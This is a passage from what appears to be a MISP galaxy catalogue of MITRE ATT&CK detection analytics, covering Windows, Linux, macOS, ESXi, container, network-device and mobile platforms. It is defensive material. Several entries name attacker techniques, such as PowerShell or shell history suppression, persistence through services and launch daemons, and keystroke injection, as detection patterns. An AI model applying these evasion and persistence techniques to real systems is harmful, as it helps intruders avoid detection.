mitre_platforms ['macOS']

Analytic 1655 - AN1655

Application vetting services could closely scrutinize applications that request Device Administrator permissions.

Internal MISP references

UUID dd7242e8-12d5-46b4-bc2c-cff6c2dbaa27 which can be used as unique global reference for Analytic 1655 - AN1655 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1655
mitre_platforms ['Android']

Analytic 1557 - AN1557

Detection of PowerShell history suppression using Set-PSReadLineOption with SaveNothing or altered HistorySavePath. Correlating these options with PowerShell usage highlights adversarial evasion attempts.

Internal MISP references

UUID 91870bc8-3a81-4d90-84e4-26c99b5642ef which can be used as unique global reference for Analytic 1557 - AN1557 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1557
mitre_platforms ['Windows']

Analytic 1575 - AN1575

Detects command-line or API-based creation/modification of Windows Services via sc.exe, powershell.exe, services.exe, or ChangeServiceConfig. Looks for creation/modification of autostart services via registry changes, file drops to System32\services, and anomalous parent-child process trees.

Internal MISP references

UUID 9a65f8bc-1b81-4e05-8e8b-bfdb0d581213 which can be used as unique global reference for Analytic 1575 - AN1575 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1575
mitre_platforms ['Windows']

Analytic 1755 - AN1755

Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. Application vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network.

Internal MISP references

UUID ee4ce869-6b88-46f8-829a-9838f7607a8f which can be used as unique global reference for Analytic 1755 - AN1755 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1755
mitre_platforms ['Android']

Analytic 1585 - AN1585

Execution of built-in or AppleScript-based system enumeration via arp, netstat, ping, and discovery of /etc/hosts contents.

Internal MISP references

UUID 80c7f835-116d-4fa1-817a-08965efef16c which can be used as unique global reference for Analytic 1585 - AN1585 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1585
mitre_platforms ['macOS']

Analytic 1558 - AN1558

Detection of unset HISTFILE or modified history variables in ESXi shell sessions. Correlation of suspicious shell sessions with no recorded commands despite active usage.

Internal MISP references

UUID 8ed1a27f-3a60-441d-b92d-dc7b086db459 which can be used as unique global reference for Analytic 1558 - AN1558 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1558
mitre_platforms ['ESXi']

Analytic 1595 - AN1595

Monitor for suspicious usage of driver enumeration utilities (driverquery.exe) or API calls such as EnumDeviceDrivers(). Registry queries against HKLM\SYSTEM\CurrentControlSet\Services and HardwareProfiles that are abnormal may also indicate attempts to discover installed drivers and services. Correlate command execution, process creation, and registry access to build a behavioral chain of driver discovery.

Internal MISP references

UUID 18e81e76-bae3-44c8-b573-dfd3564a00ad which can be used as unique global reference for Analytic 1595 - AN1595 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1595
mitre_platforms ['Windows']

Analytic 1955 - AN1955

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).

Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Internal MISP references

UUID 663bba48-7043-4407-875f-59691655d13c which can be used as unique global reference for Analytic 1955 - AN1955 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1955
mitre_platforms ['PRE']

Analytic 1559 - AN1559

Detection of CLI commands that disable history logging such as 'no logging'. Anomalous lack of new commands in session logs while activity persists is a strong signal.

Internal MISP references

UUID 77450309-6789-4025-9817-d908c4ac9e5b which can be used as unique global reference for Analytic 1559 - AN1559 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1559
mitre_platforms ['Network Devices']

Analytic 1566 - AN1566

Suspicious access to Microsoft Teams chat messages via eDiscovery, Graph API, or export methods after rare or compromised sign-in. Often associated with excessive file access, sensitive content review, or anomaly from expected user behavior.

Internal MISP references

UUID 0c833a56-ca8e-41d8-b79a-3f3c89c63a48 which can be used as unique global reference for Analytic 1566 - AN1566 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1566
mitre_platforms ['Office Suite']

Analytic 1665 - AN1665

The user can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). Application vetting services can look for applications requesting the BIND_NOTIFICATION_LISTENER_SERVICE permission in a service declaration.

Internal MISP references

UUID 462f9ed4-5b6b-4426-b383-cd331f2984c0 which can be used as unique global reference for Analytic 1665 - AN1665 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1665
mitre_platforms ['Android']

Analytic 1656 - AN1656

The user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service or request device administrator permissions should be scrutinized further for malicious behavior. Application vetting services can look for applications that request permissions to Accessibility services or application overlay. Monitor for API calls that are related to GooglePlayServices.

Internal MISP references

UUID d86a141c-b4fa-48fd-a15b-2cd3254b3400 which can be used as unique global reference for Analytic 1656 - AN1656 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1656
mitre_platforms ['Android']

Analytic 1567 - AN1567

Detects suspicious USB HID device enumeration and keystroke injection patterns, such as rapid sequences of input with no user context, scripts executed through simulated keystrokes, or rogue devices presenting themselves as keyboards.

Internal MISP references

UUID 0f05915c-e146-4921-840b-1a08774ca4d2 which can be used as unique global reference for Analytic 1567 - AN1567 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1567
mitre_platforms ['Windows']

Analytic 1576 - AN1576

Detects creation or modification of systemd service units, addition of cron jobs that invoke binaries on boot, or suspicious writes to /etc/init.d/. Monitors chmod +x and systemctl execution paths, especially from non-root parent processes.

Internal MISP references

UUID 9a73d14c-ce3c-47c5-a6c2-3d6b49c4d009 which can be used as unique global reference for Analytic 1576 - AN1576 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1576
mitre_platforms ['Linux']

Analytic 1756 - AN1756

Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. Application vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network.

Internal MISP references

UUID 6d2d8aff-7d23-40bc-bc29-54852baed5f1 which can be used as unique global reference for Analytic 1756 - AN1756 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1756
mitre_platforms ['iOS']

Analytic 1675 - AN1675

Many properly configured firewalls may naturally block command and control traffic. Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.

Internal MISP references

UUID 8503331d-09f5-49d3-838c-f0d3b1d55e30 which can be used as unique global reference for Analytic 1675 - AN1675 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1675
mitre_platforms ['Android']

Analytic 1765 - AN1765

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID a088cd64-106e-4fe2-a004-5796c574cfd0 which can be used as unique global reference for Analytic 1765 - AN1765 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1765
mitre_platforms ['Android']

Analytic 1657 - AN1657

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells. Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense) Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.

Internal MISP references

UUID f2c74903-6770-4f55-9a11-edcf6e00938e which can be used as unique global reference for Analytic 1657 - AN1657 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1657
mitre_platforms ['Android']

Analytic 1586 - AN1586

ESXi shell or SSH access issuing esxcli network diag ping or viewing routing tables to identify connected hosts.

Internal MISP references

UUID 88041144-900d-4968-9e8a-8f1f63ae8417 which can be used as unique global reference for Analytic 1586 - AN1586 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1586
mitre_platforms ['ESXi']

Analytic 1568 - AN1568

Detects USB HID device enumeration under /sys/bus/usb/devices/ and rapid keystroke injection resulting in command execution such as bash or Python scripts launched without interactive user activity.

Internal MISP references

UUID b61673d6-244f-4888-9370-1a3ef391a6c2 which can be used as unique global reference for Analytic 1568 - AN1568 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1568
mitre_platforms ['Linux']

Analytic 1685 - AN1685

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 50a9f608-68aa-4bf2-b24d-2a22f2a96db4 which can be used as unique global reference for Analytic 1685 - AN1685 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1685
mitre_platforms ['Android']

Analytic 1658 - AN1658

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells. Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense) Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.

Internal MISP references

UUID 649ee05c-9f09-47fc-802a-7df2ce362563 which can be used as unique global reference for Analytic 1658 - AN1658 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1658
mitre_platforms ['iOS']

Analytic 1965 - AN1965

Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.

Internal MISP references

UUID 0922c3e9-26fb-4330-8d7a-2b9a4661db88 which can be used as unique global reference for Analytic 1965 - AN1965 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1965
mitre_platforms ['PRE']

Analytic 1569 - AN1569

Detects abnormal HID device enumeration via I/O Registry (ioreg -p IOUSB) and keystroke injection targeting AppleScript, osascript, or PowerShell equivalents. Defender correlates new USB device connections with rapid script execution.

Internal MISP references

UUID 4b47697b-ff9b-4af7-a079-d34210cebdab which can be used as unique global reference for Analytic 1569 - AN1569 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1569
mitre_platforms ['macOS']

Analytic 1956 - AN1956

If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as User Execution or Ingress Tool Transfer .

Internal MISP references

UUID 4ef6c517-011e-4155-897f-e86cea5824b4 which can be used as unique global reference for Analytic 1956 - AN1956 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1956
mitre_platforms ['PRE']

Analytic 1596 - AN1596

Detect attempts to enumerate kernel modules through lsmod, modinfo, or inspection of /proc/modules and /dev entries. Focus on unusual execution contexts such as unprivileged users or processes outside expected administrative workflows.

Internal MISP references

UUID b55c3339-2d4c-4392-8d26-c257ea2f1bb9 which can be used as unique global reference for Analytic 1596 - AN1596 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1596
mitre_platforms ['Linux']

Analytic 1659 - AN1659

On Android, the user can review which applications can use premium SMS features in the "Special access" page within application settings. Application vetting services can detect when applications request the SEND_SMS permission, which should be infrequently used.

Internal MISP references

UUID 5c280910-f7cf-4e7a-9b99-a592115dbc8b which can be used as unique global reference for Analytic 1659 - AN1659 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1659
mitre_platforms ['Android']

Analytic 1695 - AN1695

On Android, the user can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.

Internal MISP references

UUID e1db1813-109f-4f24-87e3-5d7b5e506dd3 which can be used as unique global reference for Analytic 1695 - AN1695 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1695
mitre_platforms ['Android']

Analytic 1577 - AN1577

Detects creation or modification of LaunchDaemon or LaunchAgent plist files under /Library/LaunchDaemons/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl, property list edits, and file permission changes.

Internal MISP references

UUID f315abd4-7115-45ac-9466-64c23367cd41 which can be used as unique global reference for Analytic 1577 - AN1577 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1577
mitre_platforms ['macOS']

Analytic 1775 - AN1775

Application vetting services could look for android.permission.READ_CALENDAR or android.permission.WRITE_CALENDAR in an Android application’s manifest, or NSCalendarsUsageDescription in an iOS application’s Info.plist file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary.

Internal MISP references

UUID abfa1de9-fcf5-44da-a910-f83273b60813 which can be used as unique global reference for Analytic 1775 - AN1775 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1775
mitre_platforms ['iOS']

Analytic 1757 - AN1757

Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.

Internal MISP references

UUID b2ef244c-b230-4c2b-b0a6-070e5c376f32 which can be used as unique global reference for Analytic 1757 - AN1757 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1757
mitre_platforms ['iOS']

Analytic 1578 - AN1578

Detects creation of new container system processes via docker run --restart, kubectl exec to init containers, or modification of container init specs. Flags container images that override entrypoints to embed persistence behaviors.

Internal MISP references

UUID 52ee5593-7db2-4ad0-b5f4-630ebcf2ce0f which can be used as unique global reference for Analytic 1578 - AN1578 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1578
mitre_platforms ['Containers']

Analytic 1587 - AN1587

Execution of discovery commands like show cdp neighbors, show arp, and other interface-level introspection on Cisco or Juniper devices.

Internal MISP references

UUID aad71d3e-93b0-4cb6-8240-274369f8ad34 which can be used as unique global reference for Analytic 1587 - AN1587 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1587
mitre_platforms ['Network Devices']

Analytic 1785 - AN1785

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 9c721bd4-75df-4381-bd70-29679aa78a4b which can be used as unique global reference for Analytic 1785 - AN1785 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1785
mitre_platforms ['iOS']

Analytic 1758 - AN1758

Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.

Internal MISP references

UUID f463fae8-5697-4539-b6c7-e67aadf81c73 which can be used as unique global reference for Analytic 1758 - AN1758 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1758
mitre_platforms ['Android']

Analytic 1579 - AN1579

Detects assignment of high-privilege roles to user or service accounts via Kubernetes RoleBinding or ClusterRoleBinding objects, especially outside of CI/CD automation or from unknown IPs.

Internal MISP references

UUID b721ae18-79fc-4b82-8991-93980b14ded5 which can be used as unique global reference for Analytic 1579 - AN1579 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1579
mitre_platforms ['Containers']

Analytic 1597 - AN1597

Detect loading or inspection of kernel extensions (kextstat, kextfind) and file access to /System/Library/Extensions/. Monitor unexpected usage of these utilities by non-administrative users or scripts.

Internal MISP references

UUID d9ee822c-6a91-4c83-9698-779ca0bf8663 which can be used as unique global reference for Analytic 1597 - AN1597 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1597
mitre_platforms ['macOS']

Analytic 1975 - AN1975

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e9808ca9-3019-4395-b2d8-717f5d4863fe which can be used as unique global reference for Analytic 1975 - AN1975 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1975
mitre_platforms ['PRE']

Analytic 1957 - AN1957

If infrastructure or patterns in the malicious web content utilized to deliver a Drive-by Compromise have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID f1e4a6ae-86b5-4cf1-a044-0ffc6551196e which can be used as unique global reference for Analytic 1957 - AN1957 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1957
mitre_platforms ['PRE']

Analytic 1759 - AN1759

Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.

Internal MISP references

UUID 1076f33e-a959-49b8-97a3-2edf0360fae2 which can be used as unique global reference for Analytic 1759 - AN1759 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1759
mitre_platforms ['iOS']

Analytic 1795 - AN1795

Application vetting services could look for android.permission.READ_SMS in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 421fc6dc-1275-4eca-9950-150ad27d9bfd which can be used as unique global reference for Analytic 1795 - AN1795 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1795
mitre_platforms ['Android']

Analytic 1588 - AN1588

Detection focuses on monitoring registry modifications under HKLM\SOFTWARE\Microsoft\Netsh that indicate the addition of helper DLLs, followed by anomalous child process activity or module load behavior initiated by netsh.exe. These behaviors are rarely legitimate and may represent an adversary establishing persistence.

Internal MISP references

UUID 5ca1b37f-31c9-414b-9a31-9f80f553c44a which can be used as unique global reference for Analytic 1588 - AN1588 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1588
mitre_platforms ['Windows']

Analytic 1985 - AN1985

Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Consider use of services that may aid in the tracking of capabilities, such as certificates, in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.

Internal MISP references

UUID 97b0c549-88d2-4739-a081-a9113e25cf1a which can be used as unique global reference for Analytic 1985 - AN1985 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1985
mitre_platforms ['PRE']

Analytic 1958 - AN1958

Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID ae4f420e-1d38-4f6e-b4b6-4b0932f596e7 which can be used as unique global reference for Analytic 1958 - AN1958 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1958
mitre_platforms ['PRE']

Analytic 1598 - AN1598

Detects registration of new or modified network provider DLLs via registry changes, anomalous file creation of DLLs in system directories, and suspicious process activity (mpnotify.exe interacting with non-standard DLLs). Multi-event correlation ties registry modification events to subsequent DLL loads during user logon activity.

Internal MISP references

UUID c94f0795-ef0b-4e22-8395-bbba4f28346f which can be used as unique global reference for Analytic 1598 - AN1598 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1598
mitre_platforms ['Windows']

Analytic 1589 - AN1589

Creation of inbox rules via PowerShell (New-InboxRule) or transport rules using Exchange cmdlets. Correlates user behavior, cmdlet usage, and rule properties.

Internal MISP references

UUID fe489775-b01e-4da2-a0e2-962d1572ba09 which can be used as unique global reference for Analytic 1589 - AN1589 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1589
mitre_platforms ['Windows']

Analytic 1995 - AN1995

Monitor for logged domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting. In some cases, abnormal subdomain IP addresses (such as those originating in a different country from the root domain) may indicate a malicious subdomain.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. Monitor for queried domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting. In some cases, abnormal subdomain IP addresses (such as those originating in a different country from the root domain) may indicate a malicious subdomain.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 0cadbf9f-befa-4bd8-85b8-e5af53383953 which can be used as unique global reference for Analytic 1995 - AN1995 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1995
mitre_platforms ['PRE']

Analytic 1959 - AN1959

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 41990c88-06e2-4453-88bf-6bebe776a9a1 which can be used as unique global reference for Analytic 1959 - AN1959 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1959
mitre_platforms ['PRE']

Analytic 1599 - AN1599

Suspicious process initiating outbound connections to web services without corresponding response or return traffic, indicative of one-way command channels.

Internal MISP references

UUID 8626f553-efed-4418-bbc6-b9fa83b0b315 which can be used as unique global reference for Analytic 1599 - AN1599 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1599
mitre_platforms ['Windows']

Analytic 1666 - AN1666

The user can view applications that have registered accessibility services in the accessibility menu within the device settings.

Internal MISP references

UUID dda0e909-cceb-40eb-bff0-6bd0cd74e638 which can be used as unique global reference for Analytic 1666 - AN1666 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1666
mitre_platforms ['Android']

Analytic 1766 - AN1766

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID 4cb75669-f88d-4374-be51-e4b99e22b64e which can be used as unique global reference for Analytic 1766 - AN1766 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1766
mitre_platforms ['iOS']

Analytic 1667 - AN1667

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID 729a7413-3c5b-4637-a97b-9bba9f7734a7 which can be used as unique global reference for Analytic 1667 - AN1667 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1667
mitre_platforms ['Android']

Analytic 1676 - AN1676

Many properly configured firewalls may naturally block command and control traffic. Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.

Internal MISP references

UUID acc1bb20-bd46-4228-abba-f4befe82e926 which can be used as unique global reference for Analytic 1676 - AN1676 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1676
mitre_platforms ['iOS']

Analytic 1686 - AN1686

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 76cb5e62-9291-411d-90bf-57642b63f8b8 which can be used as unique global reference for Analytic 1686 - AN1686 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1686
mitre_platforms ['iOS']

Analytic 1668 - AN1668

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID c56cfd62-b8cb-49be-820b-e447a1605106 which can be used as unique global reference for Analytic 1668 - AN1668 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1668
mitre_platforms ['iOS']

Analytic 1966 - AN1966

If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as Ingress Tool Transfer.

Internal MISP references

UUID 4403499c-b81c-4d0e-896c-67178547ac18 which can be used as unique global reference for Analytic 1966 - AN1966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1966
mitre_platforms ['PRE']

Analytic 1669 - AN1669

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 3723c7a3-2ea7-455f-aec5-29300cb7ae64 which can be used as unique global reference for Analytic 1669 - AN1669 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1669
mitre_platforms ['Android']

Analytic 1696 - AN1696

On Android, the user can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.

Internal MISP references

UUID 4a7169fa-79d4-4724-ad55-6e9842b7cb94 which can be used as unique global reference for Analytic 1696 - AN1696 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1696
mitre_platforms ['iOS']

Analytic 1677 - AN1677

Application vetting services may be able to list domains and/or IP addresses that applications communicate with. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of DexClassLoader, System.load, or the WebView JavaScriptInterface capability; on iOS, use of JSPatch or similar capabilities).

Internal MISP references

UUID 7b4c77fd-f350-48ec-abce-aac3e35c939f which can be used as unique global reference for Analytic 1677 - AN1677 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1677
mitre_platforms ['Android']

Analytic 1776 - AN1776

